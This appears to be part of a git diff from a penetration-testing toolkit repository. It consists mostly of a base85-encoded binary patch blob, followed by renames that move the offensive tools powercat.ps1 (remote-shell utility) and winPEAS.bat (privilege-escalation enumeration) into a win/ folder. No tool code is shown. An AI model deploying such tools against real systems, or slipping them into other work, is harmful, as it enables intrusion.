zNea^&87D;GdO;`Coi#Y%eO}f)0qua-xrIc-hQ)hM{Ir@^Xk70t=eHns%jrXMt{Tj1 zJA*gdA?I$0O>%bSaynXg-!SAW1amKGw$q4{iJ>O%oBTbaV!dPII+NF$d!+iTb}c(s z!nmVV9>XwRWFP)~U?^^bo6(yQhqf4D;~k#f-XKw=kVqKe4^z>Z5c-W0;yYAvd(&QA zB$`U>agOUL>c1*K0vc~C@Mm;n1t?tR#o)75++UDwW|D*ucrJKg+N@dCW846a0wT&-iLbd zxCjoaq1;%B6W>z7pCzMR+_b#m?7|s*Z3;AV5kK4dZ`Zg=HTGYIyEYwZilwCl{n3g3 zkgFxkjU)fdN~R^UYc}#(Ebn%T1>)Hjoy$aEyUe%bx?a#4ZNVRMKOm!S^ZJ`veOmK1 zwytP>^K#-3k4pb7vb{Q=<4Qk!|lZ=94xd8qQ;Z|&fP^>Z2eMf$@P;Wd!K~-M6fYigHrouER z?HqouMIjA-N&{WPxxN7cW|i#^_>RL~7g=1hZEAPGcRcRL@Em?`r8(fMH>=A+5k_Gp zLLcu!5$5XH1JbR?74zJ<1CqXR0vNv&0_EZkZwiuV`;lc+RMUQkE5z4yL^17GGmj_@ znp#bRvkaGwbx~9o+hS)A9~Lz!2L{@YG=)-wqTQCn@vR2Gr~6X1AL(z$k|e*GN}bSs zn~%gf$p^P0#jfGx037t$4??sPtZW8alIsB`Ip@bT6>E32sdf3qYj?Qfm2bc&W+X;( zho8?{UuqMj+8wn<6!P*6IKp(g!eAA3^mLRQSG6PPQcn7zT=wh%MZx@XbVBfJ`#hF|FofJzT}^(qHz5b4laNqf zi1HyWmYxZ4?A0hCcu={+haOk%C(#ZPBitr~`Qvw#d2G?F+DYA9e>!T={FtLBpM>VY;Rk-#}Nm?2{0+sq*y_l1fMMubN!zsM9Ei z%xco%0HRcq8Uh@+{SLB^sa(Q!@3E%ZO0x9>ga~nb1L2!)5k#*uBBJ0AXk9aJ1Cd;x z%lu{sRel=~8$BDsZ@Std4`e_+li01>1x$a9zxc5Z9thAQ;@mIU+H& z;;skUM1Z}^2p0HRu37mUCHP}IKV=8)zsHGYYF32J`kVWQ)lj7~Ub|LslC1k;~D6Z=|L~6XM zYt1d(96#f-ve~mcjC7=XhEsVos0WtywHMb8l&4)^je7N_J@}TI@Y88|Ioelovro-v z2%sjS_X@+b(5R@oc~qXf$J;P*4Uie;9x}}FRL%`^4>Qb2LbMnrBkIbC#+vq2I_phG zSlfDK?!hEA@;eq*$>wZ6e}a@x=y$+=|8#rBj&KSz#kEy$pqgvLt-SYtAcMvap~o~> zzd`{Rho9ziE)iJlUS>sST>hjRwv+IoI!@i=iM-BdUx; zO0)wx*Ppmb?i5^g#C3a?o9h~))NEL_>_~uKk}7cl6OymQSy)&$|hRTnkoX>z{rsji^EeCE7=fFwIH+?;b)ntau{M_`GX4I>^{E`jF_`amMo0rnon^wLeA1P;7i(<$n@NYBf4_LCPGMhPy}#b4-N&u89c_L3e-Ic2~IHq9kP;+ zxW4P<`v>uNzVK5kM5FitJ^S$*dp;XlBf%BB3K(xX9l@UhBnh3)kl6VE=cvVV4;0J8 z8FSn}pO47y50f}k41zrF!w}b3Bp04Pa7sLTCL3M^qvc@Ei+3Ev`= zegjNho4%m^#}Ht#C&3e*Fvvo2oUN0p>q^)w;wh!vmerS8eOn*=R$?|v>sZX&$roaD zfda)Z=H{S5Pj6IdH%ZOr7YWQB9NK&j_})MgEJ(Wk6$wY`}Ps=iq5lBl&R=6-zAv=HI4)qbbb3Q>X)2Js9S-8 z|A_Js_5;L%DHQs1`YVVmaNqbEdV|^(tahF2^Ii~%sb0C_INu}s3J&{67zd!*2Ov~_ zfGFKblrPTVVaFbzRJj~g9oGVu)9O5o%HBg6SgOPl!`z`J4ZU;y0O28@9axC=5KAaT z`h6zJUFZ54Mqs9k*X)Nth$!Vrpiy<5h>iG(xwBIUhIFf0!I>!4gBBF|M*xjcyc=&J z2z1W|*WLiuwMRt*zUUh6*P$0O@l@sZ_%5uaI2q^Y3`0EW1m_&490bT_HEEk%6o(#M z{v3Tih$6^;3PpSjjsR+Won!ZUu)7HR7-!QBFnWGJ64cz{p?Q#K7IB)ZGcc!^6+jh* za3DB7IfeD)6t*rIoa950@Kdp0CP11jl4cBVH^sv~O%^ouuQ3Sk*e$eQXTq z5;6YRu?aMOzVRnC49WU>xP%gy&pGxw>hhlc1gP;K$A0d?o+Rw+9DCSGk98zoaCxS523ePLCO)Ya0KIr_?H;z zX5t$$`f$iU6`+_GfSUS%_clb)ZhOEmHX6b9HZ;KfBh-MG?Z_8^g#dIuJmr1zJdW$Q z9xxqyI57PY($N~+y9Odju9v%^IovDg4w>izjH^47iGElpe?lDrX-`f%7Nj^hc^Ozt zJ~^JHOwo@Eo>Ne18DQfs`VH!C4NXii??!FNp(s%0Tku_7yMpwT4v_09g}RYND^ecG z^bk4(Jq=?O==s16KL8|&`lBPap%~VHXFz|VK%14k8!pT~7kl30K3Aja^wV{5%w~2! z*v4gMIT4)L6pSU7svLtj)U9o__&Tucw6_a-hvgQ_D$c(C)H)hS#`D z?hvsPs9lH8P^7&d?>Q>M18C)Y*VRz)cLu+BI|?8F1TC{NK5Ad2h zP;&x0zXc3MruFV@0@0X1qFt%)?y(CC8J#Qvbb4)`?0 z?)wc@tYH=3U=_9N?nckwq3**PC!!YggqC65EeF%TTYPYS^qIFjcRB8U0nelk4 z$W44UHOEYR{2}Jzx^Ypo)m6NaTR5$K5n?jXLaa?VAXW}EEnx2}g7CwEhPLcI0iT)* z7`yXIEX}e5VSRH0yG?A1Mt(C2|J(AO9|w6KIz@K0vk%GWwH3I)7_0IVtNLAF+y=h~DvI z3g#E4^T)*(^jyw1@DV3EvBd@S2LZV+Ibs$Rf*!P7YW zEWwjF97}#8eB|IW5Ke2oP^;@Z$0ULn$NvC2@sb=p~!=Zo@p zM4BSfc_K}4(}{GjNZoWLZaR_n66rCK?hxrnk=`ciyX)P?@YDnPG>7lNxRAWJiS$8{ zR*00&xT*YDt8}C&_ZR8lR`l&f{;H_gOXNQn`E?>4FYuoB1^x+Lk%q z;(e|)tP-9Uo8hMsExPPLFy25k5+a_+**!VKY&@|#)2v&QOPGC-+<=1FGz9U$V0>H? zi5;9^S5gE9!Rv$a0(v+dOYd1Qo0X+uX=bG;Y(|oj7dGD!?O#!X5qKPv)vZtU&VVE} zTW?kiu?1fo;`$KB4meo57bJ9(oZSw`sZCxOq$r}^EXB(+kAVoIpi(<3wWCryDz&4c z9Y|Fm6A z4z3DP209qw+QW#<^AUsKoieV+QQ+D_rTm4K$`$5QsR7SqkxoHMoL_iq>2hEuaKm2YVi}%eeA`V#$5(5 zXx3HC2S>V;x)E8tc@Dn`_OpkwUta!ZhJW8n)8}FL`|BLnVr~COa^{82;g9lhR2()M z&nRG;YUHh8m8^Wx{1LJ7a6lEK_JQ}n7RdpZ75q$9c(qpIa`hnjQcbsjXHa zBG@1>j~NIWdZ($QEmPizwoHN|{HkFOx*-AC3>o6pxB#`I5l=hKn(rOg@Q%!Ooo%_5 zeQ`3Pt@@q%>kNKs4B`Rpjt0+f23_AFl5kwpYpb3E1%}mrCb9qV#QxtW`3BN_(7PYz ze8XOo#srE!SGl2aCB{tni+JtM4#r>hN-N1y8f=EdRfkC^#^;Aryk0hm#f9vuwpsbc z^(mTcdb4G`8Q~R3oa*$`&`i|ZPE;;|*!B%ZzTBYF^Hgai^LOzoYYy*>q~_|9126ok zDL?8iYTb!ijpQ2fc({Y{>Rwi3JqZY0t6EJPMSq|U+a9PwTOACl{0)uQ&{rsLP&91y zT|Bw)@~s5YMF_pB;V;%4$zQBF`z^9C_lq^}X-i{yO+$fb6}=k~?x^~Nw%VVKG2Y|1 zPrOs}K2)kGW$&}(Bf{Qk$!`NQ7Y0)I`!nwbZDn~37S@%v<@~*wpSs_h+10y2dLD!3 zm?~`>`1>V5&|CLDN*Ufbrn1;D#*QGvgNlMB)K8`R4dzGi`FbR%3-zyiC#CtU^5 zl;dD?<1s2i=Ooui6cJ_*VQ9QvVFL3aF!`5_UstDS4BkuvqdU<|IIAu0$O7 z;FnCQ{AwcU>Z*Mp`IZRsEpRYY0lp=cdK~E$Q&c$93gSj7PrkCS}?}3jnDnIjg9-EbOX5}+u|DU4HzNW`Jkb!NA zJYbRn)wFh)eVTa1;-_@+O$$(5@%?dF@?L;4F+iE_hx-XA|EJ#8ht98mrN$xG0s3`{ zmdVgK0D5Qh2Y#3Bn&Tl&v+f5(Eu0__1Z2;&UY`92y4Vs=6_|GoefnJF!vjfvw!-(E zrX%>z0R?$W_fN2G5$0d;5WeRaqWzbVf!Uc9W@y&Y&1%vzzzYb0l=nnhuUu}{g;0D2 zI=ym0X>Qi_C)#0o$X+!w1EiDH#HdS&QNJff{gl{ef0A-OG5S;UFAcVycysV`*vTNW zdId>i8G71c-{xIM=IT%6pM*!)Gfecd>1azi?SH0W&BhqNHc^sjx|cQU_Ch{9Ufhf^ z#ItP|UI0ys4+%uJx;9a%(^fr8^Ug_^>N8zfIq|M$=w&pJkb{19=cGGqh&Hf3%>-Y9 z^{$V}5>+`CY*9fO@h(d0WnGda1^P*~^|BTa*%!Lf2_Q(1cBGuC7T^gE9&FZ)Bk7#M ztAJ?MO-H6#r{MT)H!;E9wOKb1IM)wtu;<%gR!sq5ca&ssGB5{VV}&pWvIoor*+k6w z2~SUUwO}|Q=*>XvEj7Au%EIQza)I#E(XVm5bbGd%NbnGnvB`Rl8GVB zx^*bVTCow{)@!`eS#+((b8!$t9Iboha_=vk!TnLvtUH&%xW^Me3|%)hB>EG3+os8C zhv-jmtr%N0)eQ9w2&j(H*wbRMBLDfKx*7KBEvLVppo3!P}yVM}Y5T}^Pn+)tC`Zg8Dt2Qd~@z?zLWXF7xF_nP%` zD!%E{tP3XQM?`;Ac?=5BfzI{vAV6exE$lGAoWapRV;)kiv&_HJzb6o#JWH6XId{r9 zv*!4!XnGC5{Sp-}4#jKtH`Su20hmiS=$Gu>oNGjlx~N(NUsL??W$a|a9(|Mv7ojIP z<29jChnm{D_3fyQh*x9VnUuQ3=;M`v@xHMENzr?)LAdh~AAQ_YZV$l2IbAzjaXc_Q}e7Mcp_`OY^O}1>zaDgnE{7-I7wyN z#L}b>vS%1?AStM^7m&gr1%u}B1krwHkq&m}(HQmTy2wuxd3Sj)fgdT-bt1hg(o;Cj zr21|>_>20TMOq^0Dn#n$=dO2A)W0rLx18?wmy3EkM0!A^R|UPB?>vEjS>WC6y7{zk zRd1Tej~8iYQ7>Pl(?t4t8t-3)$fpSU5|Q`dS>8RK&EX?Oz1u{3ES2+FBhrLcX@$r? zDAMOd`ngD-Xq8?};rw<8yqn(+fgjB99(gda>GM~4^0&9U3y~6SL}tq5l+@`d{Uuv& znPkr^10Jgb^UeBlONmV%o;OHu&8^4-;8mAEL)6e=!$*u9H99&wCpXWMuh-v5upvA4 z282g2fu;88;~}cy^!n{Qy=LdByPS?jy+7_q+l@OaqEmPNKk1DcC@!zawT?Cn&MPXC z7(B`gwlOrTkX3H6WfhiGWEU0YWtC;)-}kcEEY_@o?2^19i?xMkT55XYjHH=aaj8?M zn&L8~$Ve%?e2l)d%vM-hqMsjL-cOHzA}qT&r*MJ2)LtIsuIWt_8A)V$rIzxNel~q} zQBi57KD$JpZCzk5hV`*J-t^(Q|0X@STP=6m3#}H2awB8nYcH`{a!VJK6fUvkc_e2- z1+mWDw44b6(TG7|QITaqc9FYoWTZYkmsb@UY*hj!c=hLIqUi+>DIvSC2vXTf^|@9{ zw#}k1FR&C9>C0_-rFNUXtgy^7NN=%PORf4CeR#R_FX-_Pvi*s?g}Y^uCD-m|5BXY3 zM7vWh*?H-_ZA*DM4X&*K62UQeH!n@kF0>_-T9fTXw!*R^OKQ#?mRwsory0W}qm!>OCK6f-ye9lhaGaxHwa~ zCod%!Gm|n}vWY3vj7croFtSIhCEs3d$&->&Q+e-M15%1H*#sU* zsVNglGIMIWH+Rambc;kWC8uSGaU)&FB_$>cNhN4%s;3ti#VMJoUgm-!^|p_xrerYl zbTXcG+LKM6nU1zRHX=QSRMo)Y8l7%Iul_mP}(%gj>8=sF7O~@cgUuG|{^^wZU?AAiK zXuYkl*kZ-M-w1ziwU?p9TueSW7mL3>pSdHoT|fmsM`0 zCBZ%I{Izg5ZO2outki0Y%voGwFZSqb5NVY3l_%lEws<>z58U@DMK-6LkT*sP18DCjd6D;2umQrnuH!x8$* zLR*18rx1_oJ#v?q+O4_xCq1#;P<4Arb_IqaJEzE^XKMgf_u}l_g2ECkM1>1VO0A%h zGULpSCr}G zFSO#j(preMlH26%eP}khO|rBM3b5(XO|uqlKf zqfE-qvy53VX5yHF!ZAfjC8cA^##qb8*mCU^m1CAjxy*?$rFu2uW)FS0jJkwe9tN(k zB%2lq$`ajd*a5{mQQ2FlW=1Fhg_-DQet~JfSo9`%i zI`=d;TL6y``B#vRd8@fO1%Gay&j`2%=?D1xQRJggcOw2O@%Ie=YVh{~{@nFOp&zp= zq6S9|)u&|W3v9NsF++w>*k1zES)4;od~m6C!4UZS+#xX1+-%#Bxj`*DgbymVR2EpQ zmN9`C&e@TC7XVe0Q)V;Ut^3&opa4@@ALRB2aMOh)Ii>cJJXSxlh};Gn)!80Sv)!!b z>KTu@L81r`Yv~ghnHLzCXR*O0@re%c%1evjoN}^r7cRgQD#>I2D6t3=10yZ$A21FK z6is{nIb)ayg{J!1dD$fk*xc*WXD;|J&@Vt7UYWf(kh{i6w`=rFAsE*nJ=QF67#$QC zIZ+R%AK02&Otvxl;e+&}2kE1R4kBfMydW^pM*pmGuGOAzL%tAO@Z56hR8jU~CnO~T@*uB4zeT zuPefZ+@jKQ3#dy11JM_YwJ+rF=}$E?W%P_=0JU#fma(V4xLS%+g})#l%vDEMzJ!g~Me=11ba!SlZki z#0uq(Al!Cf3k=LIDX+9x^%$$C_+CQi>uyNS%`HJV@zHWb3-pm=YqCUj2SsM+NaTA zxs{F`DB>viqasK|?m9b<24YEI;1XC_Wa5xi)*@>Jgs8~|70cjUbj?d$FcEBK(K^=a z!ivH?J2-+G`deVZ@=zR!MYFIZx5!>zSYe^M^f8J}HMZNu+1L_d`9YnCc*NL=H~{h# zm!mym#seVp7E*1HaH~Z*%iY_}hcO zBl!Cif0yw0B>s}2m&(Y>k;Ca9IcIAZMFDoWJnm5R`e}t$8-`+v-C|uVLIgI72wZX& zBZkmth6!1M9ZZ+|nYlFt+m!&l~LC<^HRB zIfV!dX(D;i4=xk`pt!r?|D^v%X&|q*rMoYEAW8J^)W1~Mf;$h~OYce2?_Ri98;}R? z-hC}}VaJiLZ^?T@c?WsUD$z04I;fD(%(cHaESBiEYblYjTPxMk>-nZ ziAe7i=@TM-S)>O=dRnAEiL~8e-cApZ4iagCNT-UlK%`4W`k+W(6zM^cHi+~~kzN(4 z-}}5By-0_Obb?6dh?G-FQh~@@MY=?!t3`URNH>Y}F_CT+>2{I2`Mo3ZM@0ImNL?bm zDpG&C1cgtiNC$~@q)6jMnj+E}BFzzLiAWcTbfrk|5$Pt8ZV~B=BHb?1cSL$Xq{l>h zTBPSi`i)3`66x9f#kq!{)Xpv43=~R*Ch}0_5)gs*> z(uYL)tVmxK>28tk73pD-o)YPKk-9{BRir-f8Q!1&%zv(p|IB}`hyTofu803q=Kn}3 zj`oXY_N-7Ukm9h%v02jatP1B%?wqwW7w5f3+!GfV{$xjz)=2R<4zpR}u=l{ep(vdn z?@RYd@i=$j2R11`o$%My4?pA)2608HY;kt06}821`K3nbZH~zks*{ef{9^1)i!-p5G?ph|Urmto4=Twh%v~6V z6Ahar_47$Afxhs#cFCVKm+F&b$*%YlT1xXt!kKeYVU9K1x)>6!_erx@7Pjd2DId0p zNyCn>)QTgPMIZ@bO0?)^-Z_fGE4Xq=RDJ*Tnl@qj7CXVU1vrils=v<=Hm8 zU~7XW3;WrH(r}+FA$^VyiEsz{m(L(xy8tj7SZTjc7VWP`4wpXl$+DNQ+RyrC;~3H= zz3iK9D}|O`_oajOQuJ_-FPEs!H$NXI9tD#0zHdG|i_e#i0yLnvP0 zSK;oG)K!|EZj39kWS5X_b)y{YyTt|dA`B)_3#K>2aBm|?eKFpkNQh4?2bCnW=pih4 zM<|jM2Z%-^0V#W+gyUgoQz|d8+=8NzsYzeY)Tq7)O{yC`##_N?3KG{8`$DyDu&hF4*CZUSYuxEOR%Pm z&z9BQYJhsvN27^qYY6n02e$Y1=_X5t0{@_a{u)2c>QO!#zb&&2GYrGLFj_;nuSVLU zf4bMo9tdOUzf^>hIaPhCW_A{W^{M=H+fc0vA89~y>l50S-Y^7vgw@CpYdVwCH`C9*qt66WR98b6 ze`JC>hDHO)9g72YH(#{ z0f}QU4CdnW^AhJ@)iA8q^!3(JJC^Xl7i#ZH=|<{GYqNm+3qG(VCD$Po1>IHW%Sthv}oP z@BC!(_+3*+H?A7=Wcy)LpF3K1Y|`AEpN=n>w`cRDHi!3o=A8K2(eEv@t2M7qUikUZ zb%TFSb3OCe zsDtmETAZ-$`GH!zRx9t|)ZhHONNsE%o8D;m^P&gJT|wXOKX1LaSBDpSy*2OHuiK?> z%ilig1Dn)5v+8BTs%>oWdulbBW-vhgUXPYsc)fRd+vM%l z^S^)m$kKHQPK_gZ!q~Hq-Tvgz?CBqOdG(Ev`B&cfBffOisMj{7JU=a5`T3qx#T{~T z7SEZm!6)>?$8P;Sz?EmJiCn&NcFHUJ?&-hLv8eZb#^JA2zxPL*hf@a4xnBQAm$$;h zqmr#}zS)1W`H@kj9qT)!OfvOaJ|ya~ZLX=WoLaDX_}Z-Y{qD%0dVE&>O9tG0_-tVF zn5JVPrqxg1)%_`b`Lss|+<(z;ihoh}PlqU*?uSF@W?1d(bAvRZ+PFQ@pvb~|qgPA<4-*ykhVE8}+m{K?Vw>31bOx%!8kjvv=m{{5|0qn4-k zx_?!jf8S4frd1u-{J_Q+?%xr!ZO!7Y8Oz#t_DkBocJrVEPi@W8jX9Aw@W}XfOI*)R zd#%@7A5grOkn(&IIHpL`}QR~(tAhE^V(N>*t_S2e;rWN zY2wclyM4ayo2PRhSoZVQzh^$3_o%hB#;5%D=zF5)?7zPLpB)~1JEUu3ZbMvO_0+bF z58FC@U}*DB>f3+Zv;K)$=ZeQ2ne}kmhMK?c-5j?!>+;cIF?S!S+cNuwoUx0RoT~DY0!1UWU8X~i#JR##QF!a1#inxO)tYR zLzH_4`)E3ci>Y5(S=oB(vm1Ii-mxwo@^85etJ`J#-|-G}uf9JpSQA_IWc8A`vOCVd z_w|eZ(#H!r9tyZG%97e?>kIOyqo25Aiy`Q3XZ^~EZzq@zZ~F1`8KxIj4)yza=A1jq zr09N|l7HTwFx=H6J?iy0GCDUNnXv7nGcyf6{+ZA(eAnH#zUH#84RiE5STX7@O`^&C z?Bxq{Pb_`x=}#kfhs?Sq$Fl8ZsXk=**!Qh(cM5Cw>As47+n>Mw#f<(xwD0`nebGIY z=Pqh{+sswojeR?HShQ^ar^-9EZ*BU*`f}5ov9YP&b?G%@Uc*-9!Iw5h zH12*E-eEAjLucU~G%Q>Qe|7s2O>6J)KQl=YD;T1qh7OG~L=PJ}VkBaPq3{ethl;FW z>W!g7XG16M4T8NUe#*3{frkFvA@udalS9zsY?%8Jqa7zMbQkBpbPPxL#>}nk+pu@p z=%M>`j@}dQ7@MB|*&QR}g9|?>a4M!Jmk;@N!kA%8$4eh>zT@<)kM<>R49fCP`{UiB z{k~7Ho`3rC)WIEXpKm^3>T_4-)o)(Q^Znhn@b#?vqN2D?_k@LvN_=3|3G*#~d%7Yq zt$4vkuAMQZ`P|TNGAunh4J`V--G;6UE8Xux_G)`PU`zgrjoqKQyfV)xas7^}?~Z4#oA<)zS?>k-tlc#2-HlBHBK=2f zd~?*us7w2o4_sJ$aQ!zQ{B3^!!-#mv5Bd2Rq#IpSo0V+A=owB?h!vgdp$7!@LO-Ud#mER`mk459T*+; z!N|Y28@+3TzUtAz>mzEOyn1+3zoRcjXHP%>j|XNwR2R)6ID!jmb_ZCr4msppj*&pmeS{d;F= zzHXG>zoRCg@5h_8Q9r~^*qO9gt3DsRJNLT**3VXaeJ1~WhR^U1Un}rGcKzP3-k;VG z-t+Q>g)1wE{r*_rYioVJSS4BK51BairN^=>T4`ySJ|AhVhU+P&K~kEBmK z)%&^Y^R~{}9}zPmNd7t~_oq#5zRtRMPyF0rZ?4;S`sn7&-aa4yt>>)k-@NkMo-ZC+ z-cy7Nt2MFE)VLem!im{GPQGpO|FxwXp2z+TtN-><&%!Twfq@^a(r0930k#MX>|lHY zrZyvJ2?1P`3!K_QZwDkNCZ`sa=p&*TSWuK0SVD>!P>WG-fzAT0HVxdx42sqqe1!#WJ-Z^1B zs!tCzpStr@cIB31Zzd=88?3(S@2|g7rl{?}iqDfevK1wMB!@0Ol-qmNBZsxYS)iht zty8p$ci$c>mpqGze5NN8D;Iw{`shcub(V7c<6c|YGAobZ_-SEUO)cAVzdZ`+J(aCr zT_H48F6Q@}n%{3W=A2);=Epag1wb-eZ|Yu~j8@6`iJ^8+pT1as`}jM?Fkqo_8Ca<7M(Lyg zM=jQ?poP|;7(4(qT1-IA6mWM2X@CRNy8)ItbSd}X2);qtdudxk(}BZ`p3@>aI@Kb-<{sO5@VA8O+Z#!Kr?_%r3*Mi*JX@2S^Vqj{+r+Ne zg!G+>eX#!aU1d(AYNJN6BrdkoRp(6> zr_YA7ou2(<|CALCGvdpqec1MVbxEaz;4y|%U6#AfwX3#${hM>hVP0v*9@2WZY;Jw_y1IS z#Qp~#*Cg64vX= zIng{#)lxx^oq2&7v+9(+HLvR~FFtg%Osv#k($4>7j;4wk7y061`VKQEJZo_Hb0Bt6 zNM7Eg^yQ60?TZ#`-`?)~|H;+kPg$Q`{kZPW*)$2o&vx!7pH6j3)S0W+u!(<#E#JxI z75DQ>dUV{r6}_}c$<_!x;+vHXAmvECUv8iFZR|Z_Q#hmo4ypzXWHRAv*T#kMibI7PM6f8M!qA)&L?wrW+R zu34WjWv>UT@~%Y&MboNsIF|^VUofrg)^?pH@vw_OXWdC&WoW<2%tgSXO3x_v!KI8{ z`}1?=o#vRa{oX8DQ}-r2;je-j2menD7Y`BtF2AYx@0>lyIhfeyMT&dr{P;abzEkYc z^qERp1=3Rv-+JO{tg%-`mWw6hj_cggj`x+9@4er1{p`i9jYlRw&r1}ubn;ZpXDnHh zb?3kE;wxTL8)l@hGS!(?(CVSR=G7_r3)&W*&(m+U|0wc}lwY>;*zwPIKP*|;#55f^ zHa{5=dTfSGOf5j622ct~HlRr#8y?Uf1(fHj!0^t;9LvA>Soe`J-;8DzK$PaF0 zTN;`f8JQZH0&6(*1Yot#Zc7^5`$vDG_Qf3F|F-t7^8GsojnmnxmbQ$*>RE;7y=~J<`u@2+ znlR;H#VWI_r8j2geSFBUDRINGb7vkqY3o(-IXYgwW$U|g_Q$)a`~tBn`A-E$u1U5$ zbIL=zMs`v%V|=_bq!aZC~=kqdoVP2;bKi z_0paFi|@0Ghu%3Xm4ER^=*AOK4bP4?3fm>;<~?1SH7{qOdyLIQ{k>{MlM*D=_uRNI z&(Phr{zVSQ>l~p+D|+`i1UUZNo&Vp?^`u7P-fb#2Dw*lqowXx3{Y{!0Y2K+5u)<3` I0W|Id0Im!h&j0`b literal 0 HcmV?d00001 diff --git a/powercat.ps1 b/win/powercat.ps1 similarity index 100% rename from powercat.ps1 rename to win/powercat.ps1 diff --git a/winPEAS.bat b/win/winPEAS.bat similarity index 100% rename from winPEAS.bat rename to win/winPEAS.bat